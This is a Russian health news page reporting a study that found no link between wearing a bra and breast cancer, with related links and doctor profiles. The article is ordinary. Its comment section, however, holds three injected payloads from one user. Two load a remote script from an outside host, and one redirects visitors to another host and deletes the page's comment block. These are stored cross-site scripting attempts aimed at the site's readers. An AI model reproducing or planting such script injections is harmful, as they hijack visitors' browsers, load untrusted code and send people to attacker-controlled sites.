Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Носите лифчик на здоровье...  >>  Носите лифчик на здоровье! Теперь не страшно!
 
Обратная связь
 

Носите лифчик на здоровье! Теперь не страшно!

Размер шрифта
16 апреля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Теперь вы точно можете быть уверены, что лифчик никак не повредит вашей груди: он может лишь ее украсить. Ученые доказали, что не существует связи между ношением бюстгальтера и повышенным риском развития рака молочной железы.

Носите лифчик на здоровье! Теперь не страшно!

«Существовала теория, что одной из причин более широкого распространения рака груди в развитых странах может быть то, что именно жительницы развитых стран большую часть времени носят бюстгальтер», – рассказывает Лу Чен, докторант Университета Вашингтона. «Если учесть, что большинство женщин носят бюстгальтер каждый день, подробное изучение этого вопроса было очень значимо». Результаты исследования Чена были опубликованы в журнале Cancer Epidemiology, Biomarkers & Prevention, официальном журнале Американского общества онкологов.

«Нам удалось выяснить, что ношение бюстгальтера никак не влияет на риск развития рака груди. Причем не имеет значения, сколько часов в день женщина носит бюстгальтер, в каком возрасте она начала его носить, а также есть ли в нем косточки», – заявляет Чен.

«В средствах массовой информации давно бытовало предположение, что лифчик может как-то влиять на развитие рака груди. Гипотеза состояла в том, что лифчик затрудняет отток вредных веществ из тканей молочной железы в течение дня. Однако с точки зрения биологии эта гипотеза несостоятельна, поэтому мы не были удивлены полученным результатам», – добавляет Чен.

В исследовании приняли участие пациентки с различными типами опухолей молочной железы: 454 женщины с инвазивной протоковой карциномой и 590 женщин с инвазивной лобулярной карциномой. По данным статистики эти два типа опухолей являются наиболее распространенными. 469 женщин, у которых не был выявлен рак молочной железы, составили контрольную группу. Все женщины находились в периоде постменопаузы, их возраст составил от 55 до 74 лет. У каждой из пациенток были собраны все основные медицинские данные. Также ученые выяснили, в каком возрасте каждая из женщин начала носить бюстгальтер, сколько часов в день она обычно носит его, предпочитает ли она белье с косточками или без, а также узнали у каждой размер ее бюстгальтера. Было установлено, что ни один из этих факторов не влияет на риск развития наиболее часто встречающихся типов опухолей молочной железы.

Так что носите бюстгальтер с удовольствием, ведь он абсолютно необходим любой женщине в повседневной жизни. Главное – правильно подберите свой размер.

Другие статьи о женском здоровье ищите на страницах нашего одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:14

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Анджелина Джоли удалила 2 груди всего лишь из-за риска рака! А вы бы удалили?   Кофе спасет от рака груди! Сколько пить, чтобы избежать смерти?   Как подобрать бюстгальтер в зависимости от груди   Как обследовать свою грудь?  
26 июня 2013Что пить, чтобы не было рака груди? 06 февраля 2013Технология разведения коров позволяет определить риск развития рака
 
01 января 2013Скажи мне, где ты работаешь, и я скажу, будет ли у тебя рак груди 18 октября 2012Новый тест скажет, будет у вас рак или нет
 

Слайдшоу

1
Мастопатия может коснуться каждой
Мифы о лифчике!
Как изменить будущее и не заболеть раком груди?

Тесты

1
Что вы знаете о груди?
Что вы знаете о раке груди?
Что вы знаете о раке груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.